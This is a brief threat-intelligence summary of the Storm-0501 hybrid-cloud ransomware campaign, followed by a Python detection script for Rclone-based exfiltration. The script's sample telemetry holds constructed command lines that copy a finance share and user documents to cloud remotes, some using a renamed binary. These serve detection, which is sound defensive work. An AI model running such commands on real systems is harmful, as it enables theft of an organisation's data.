Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks
The threat actor Storm-0501 has been targeting U.S. government, manufacturing, transportation, and law enforcement sectors in a multi-stage ransomware campaign. Active since 2021, the group uses weak credentials and unpatched vulnerabilities to compromise hybrid cloud environments, performing lateral movement from on-premises to cloud systems. Their operations involve data exfiltration, credential theft, and ransomware deployment. Using tools like Cobalt Strike and Rclone, they maintain persistent access and move data to cloud storage. Storm-0501, now an affiliate of the ransomware-as-a-service (RaaS) platform Embargo, employs double extortion tactics, encrypting files and threatening data leaks unless a ransom is paid.
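The summary notes that the group moves stolen data to cloud storage with Rclone. As an added defender-side illustration (not code from the Microsoft report or from this page), the script below flags Rclone-style copy and sync commands aimed at a cloud remote in process-creation telemetry, including the case where the binary has been renamed, and suppresses a sanctioned backup job through a small allow list. The JSON field names, host names, users, file paths, remote names and the allow-list entries are all constructed for the example and match no vendor schema or real environment.

```python
"""Flag Rclone-style copies to cloud remotes in process-creation telemetry."""
import json
import re
import shlex
from pathlib import PureWindowsPath

# Constructed sample telemetry (JSON lines). Field names, hosts, users,
# paths and remote names are invented for this example.
SAMPLE_EVENTS = r"""
{"ts":"2024-09-20T02:14:05Z","host":"FS01","user":"svc_backup","image":"C:\\Temp\\rclone.exe","cmdline":"rclone.exe copy D:\\Shares\\Finance mega:dump --transfers 32 -q"}
{"ts":"2024-09-20T02:15:11Z","host":"FS01","user":"svc_backup","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c dir D:\\Shares"}
{"ts":"2024-09-20T03:01:40Z","host":"WS17","user":"jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\rc.exe","cmdline":"rc.exe sync \"C:\\Users\\jdoe\\Documents\" s3:staging-bucket --config C:\\Users\\Public\\r.conf"}
{"ts":"2024-09-20T03:05:00Z","host":"BK02","user":"svc_backup","image":"C:\\Program Files\\rclone\\rclone.exe","cmdline":"rclone.exe sync D:\\Backups gdrive:corp-backups --config C:\\ProgramData\\rclone\\rclone.conf"}
"""

# Rclone subcommands that take a destination remote as a positional argument.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

# A remote destination has the shape "name:path". Remote names are defined in
# the user's rclone config, so we match the shape rather than a fixed list.
# Requiring at least two name characters keeps Windows drive letters (D:\...)
# out, and the lookahead keeps URLs (http://...) out.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?![\\/])")

# Constructed allow list of sanctioned backup jobs: (host, remote prefix).
ALLOWED_REMOTES = {("BK02", "gdrive:corp-backups")}

# Constructed expectation: the sanctioned binary lives under Program Files.
EXPECTED_INSTALL_PREFIX = "c:\\program files\\"


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event):
    """Return a finding dict for an rclone-shaped transfer to a remote, else None."""
    # Non-POSIX mode keeps Windows backslashes intact and leaves quoted
    # paths as single tokens.
    tokens = shlex.split(event["cmdline"], posix=False)
    if len(tokens) < 3:
        return None
    verb = tokens[1].lower()
    remotes = [t for t in tokens[2:] if REMOTE_RE.match(t)]
    if verb not in RCLONE_VERBS or not remotes:
        return None  # not a copy/sync/move with a remote destination
    remote = remotes[-1]  # destination is the last positional remote
    if any(event["host"] == h and remote.startswith(r) for h, r in ALLOWED_REMOTES):
        return None  # sanctioned backup job

    image = PureWindowsPath(event["image"])
    reasons = [f"{verb} to remote {remote}"]
    if image.name.lower() not in ("rclone.exe", "rclone"):
        reasons.append(f"renamed binary {image.name.lower()}")
    if not event["image"].lower().startswith(EXPECTED_INSTALL_PREFIX):
        reasons.append(f"binary run from {image.parent}")
    if "--config" in tokens:
        reasons.append("non-default config file")
    return {
        "ts": event["ts"],
        "host": event["host"],
        "user": event["user"],
        "severity": "high" if len(reasons) >= 2 else "medium",
        "reasons": reasons,
    }


def scan(text=SAMPLE_EVENTS):
    """Run classify() over every event and return the findings in order."""
    return [f for f in (classify(e) for e in parse_events(text)) if f]


if __name__ == "__main__":
    for finding in scan():
        print(json.dumps(finding))
```

Run against the constructed sample, the script reports the two hosts where an rclone-shaped transfer targets a cloud remote outside the allow list (FS01, where rclone runs from a temp directory, and WS17, where the binary has been renamed and points at a config file in a public folder) and stays silent on the sanctioned backup job and on the unrelated cmd.exe event. Matching the command shape rather than the file name is what catches the renamed binary; the allow list is what keeps a real backup job from paging anyone.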